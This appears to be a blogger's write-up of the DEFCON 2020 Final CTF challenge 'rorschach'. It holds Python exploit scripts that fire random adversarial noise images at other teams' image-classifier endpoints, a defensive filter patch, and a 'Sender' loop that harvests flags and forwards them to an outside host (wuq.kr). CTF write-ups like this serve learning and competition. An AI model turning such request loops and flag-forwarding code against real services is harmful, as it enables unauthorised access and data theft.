
[DEFCON 2020 Final] rorschach

by jskimm 2022. 1. 10.

The intended solution was to generate a random adversarial example, estimate the gradient direction at the decision boundary, and then update the noise with the HopSkipJump attack to obtain a more refined adversarial example.

 

My approach, however, was to generate a random adversarial example and repeat until one of the images I made got a correct answer... this worked because we did not need 100% classification accuracy to get a correct answer, and a correct answer is what yields a flag. This method could no longer get a flag after the service was patched with regard to accuracy tho ☹️

 

Anyway, my exploit code is below :p

 

import numpy as np
import random
import cv2
import os
import requests
import re
import imageio

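def sendImage(path, team):
    """POST the image at *path* to a team's /predict endpoint and parse the reply.

    Args:
        path: Path of the image file uploaded as the ``file`` form field.
        team: Team number substituted into the ``10.13.37.<team>`` host.

    Returns:
        A ``(percentage, idx)`` tuple of strings: the first ``[...]`` span
        found in the response body, and the digits that follow the first
        ``<p>`` tag.

    Raises:
        AttributeError: If either pattern is absent from the response body
            (``re.search`` returned ``None``).
    """
    url = 'http://10.13.37.{}:14045/predict'.format(team)
    # For local testing, use 'http://127.0.0.1:5000/predict' instead.
    # Close the upload handle explicitly rather than relying on garbage
    # collection: the caller runs this function in an endless loop.
    with open(path, 'rb') as upload:
        r = requests.post(url, files={'file': upload}, data={'brave': 'on'})
    percentage = re.search(r"\[.+\]", r.text).group(0)
    # group(0) is "<p>NNN"; dropping the first three characters leaves the digits.
    idx = re.search(r"\<p\>[0-9]+", r.text).group(0)[3:]
    return (percentage, idx)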

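def init(prob):
    """Build a random 112x112 single-channel ``uint8`` image.

    Each pixel is drawn independently: with probability *prob* it stays 0,
    otherwise it receives a uniformly random value in 127..255.

    Args:
        prob: Probability in [0, 1] that a pixel is left black.

    Returns:
        A ``numpy.ndarray`` of shape ``(112, 112, 1)`` and dtype ``uint8``.
    """
    output = np.zeros((112, 112, 1), np.uint8)
    for i in range(output.shape[0]):
        for j in range(output.shape[1]):
            if random.random() >= prob:
                # random.randint includes both endpoints, and 256 does not fit
                # in uint8 (it wraps to 0 on older NumPy and raises
                # OverflowError on NumPy 2), so the upper bound is 255.
                output[i][j] = random.randint(127, 255)
    return output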


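def sp_noise(image, prob):
    """Return a ``uint8`` copy of *image* with salt-and-pepper style noise.

    One random draw ``r`` in [0, 1) is made per (row, column) position:

    * ``r < prob``      -> the pixel is set to 0;
    * ``r > 1 - prob``  -> the pixel is set to a random value in 1..255;
    * otherwise         -> the pixel is copied from *image*.

    The first rule is tested first, so it wins where the ranges overlap
    (``prob > 0.5``).

    Args:
        image: Array whose first two axes are iterated as rows and columns.
        prob: Probability used for each of the two noise rules.

    Returns:
        A new ``uint8`` array with the same shape as *image*.
    """
    output = np.zeros(image.shape, np.uint8)
    thres = 1 - prob
    for i in range(image.shape[0]):
        for j in range(image.shape[1]):
            rdn = random.random()
            if rdn < prob:
                continue  # pixel stays at its zero initial value
            if rdn > thres:
                # random.randint includes both endpoints; 256 would overflow
                # uint8, so the upper bound is 255.
                output[i][j] = random.randint(1, 255)
            else:
                output[i][j] = image[i][j]
    return output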

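teams = [1,7,9,11,12,13,14,16]

# Each round writes one fresh random image, submits it to every team in the
# list, and keeps a copy under ./result/<team>/<index>.png whenever the
# returned index is not '64'.
# NOTE(review): '64' is presumably the index the service reports for a miss;
# confirm against the service.
while True:
    # This line was indented with tabs while the rest of the loop uses spaces,
    # which Python 3 rejects; it now matches the loop body.
    cv2.imwrite('test.png', init(0.75))
    for target in teams:
        target = str(target)
        percentages, result = sendImage("test.png", target)
        if result != '64':
            # makedirs also creates ./result itself and tolerates an existing
            # directory, where os.mkdir failed if the parent was missing.
            os.makedirs(f"./result/{target}", exist_ok=True)

            # `target` comes from the local list and `result` is limited to
            # digits by the regex in sendImage, so no response-controlled
            # shell metacharacters reach this command string.
            os.system('cp test.png ./result/{}/{}.png'.format(target, result))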

Patch

#!/usr/bin/env python3

import imageio
import sys
import os
import keras
import numpy as np
import tensorflow as tf

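# Input filter: loads the model named in argv[1], classifies the image named
# in argv[2], and raises AssertionError unless the image passes both checks
# below.
# NOTE(review): presumably the service runs this per upload and treats a
# non-zero exit status as "reject"; confirm against the caller.

# TensorFlow setup: disable eager execution and, when a GPU is present,
# enable memory growth on the first one.
tf.compat.v1.disable_eager_execution()
gpu = tf.config.experimental.list_physical_devices('GPU')
if gpu:
    tf.config.experimental.set_memory_growth(gpu[0], True)

COMPILE_OPTIONS = { 'loss': 'categorical_crossentropy', 'optimizer': 'adam', 'metrics': ['accuracy'] }


print("I fear....")
LOADED_MODEL = keras.models.load_model(sys.argv[1])
LOADED_MODEL.compile(**COMPILE_OPTIONS)
paths = [ sys.argv[2] ]
# Scale pixels to [0, 1] and add a trailing channel axis. np.stack is given a
# list because passing a bare generator is deprecated in NumPy.
imgs = np.stack([np.expand_dims(imageio.imread(i) / 255, 2) for i in paths])
predictions = dict(zip(paths, map(list, LOADED_MODEL.predict(imgs))))
cls = next(iter(predictions.values()))

# Check 1: the top class score must reach THRESH; low-confidence inputs are
# rejected. Raised explicitly instead of using `assert`, because `python -O`
# strips assert statements and would silently disable the filter.
THRESH = 0.96
if max(cls) < THRESH:
    raise AssertionError

# Check 2: more than 2000 of the 112*112 pixels must be exactly 0. The reshape
# also fails (ValueError) for any image that does not hold 112*112 values.
zero_pixels = sum(1 for p in imageio.read(sys.argv[2]).get_data(0).reshape(112*112) if p == 0)
if zero_pixels <= 2000:
    raise AssertionError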

Sender

import numpy as np
import random
import cv2
import os
import requests
import re
import imageio

def getidx(team):
  """Fetch a team's index page and return the number it advertises.

  Args:
    team: Team number substituted into the ``10.13.37.<team>`` host.

  Returns:
    The digits following the first ``"number "`` in the page, as a string.

  Raises:
    AttributeError: If the page holds no ``number <digits>`` text.
  """
  page = requests.get('http://10.13.37.{}:4045/'.format(str(team)))
  found = re.search(r"number ([0-9]+)", page.text)
  # The capture group is exactly the text after the 7-character "number " prefix.
  return found.group(1)

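def sendImage(path, team):
  """POST a stored image to a team's /predict endpoint and extract the token.

  Args:
    path: Path of the image file uploaded as the ``file`` form field.
    team: Team number substituted into the ``10.13.37.<team>`` host.

  Returns:
    The first run of ten or more characters from ``0-9A-F`` in the response
    body; the caller treats this as the flag.

  Raises:
    AttributeError: If the response holds no such run.
  """
  url = 'http://10.13.37.{}:4045/predict'.format(str(team))
  # Close the upload handle explicitly rather than relying on garbage
  # collection: the caller runs this function in an endless loop.
  with open(path, 'rb') as upload:
    r = requests.post(url, files={'file': upload}, data={'brave': 'off'})
  return re.search(r"[0-9A-F]{10,}", r.text).group(0)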

def sendflag(flag):
  """Submit *flag* to the flag-submission API with a GET request.

  The flag is placed directly in the URL path, and the request goes over
  plain HTTP. The response is not inspected and nothing is returned.
  """
  requests.get(f'http://wuq.kr:6060/api/submit_flag/{flag}')

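targets = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,16]

# For every team, ask the service which index it currently expects and, if an
# image for that index was saved earlier (result/<team>/<idx>.png), replay it
# and forward the returned token to the submission API.
while True:
  for team in targets:
    idx = getidx(team)
    image_path = f'result/{team}/{idx}.png'
    if not os.path.exists(image_path):
      continue
    try:
      flag = sendImage(image_path, team)
      print(team, flag)
      sendflag(flag)
    except Exception as exc:
      # Still best-effort per team, but no longer a bare `except:`, which
      # also swallowed KeyboardInterrupt and hid every failure.
      print(team, 'failed:', exc)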

Get a flag
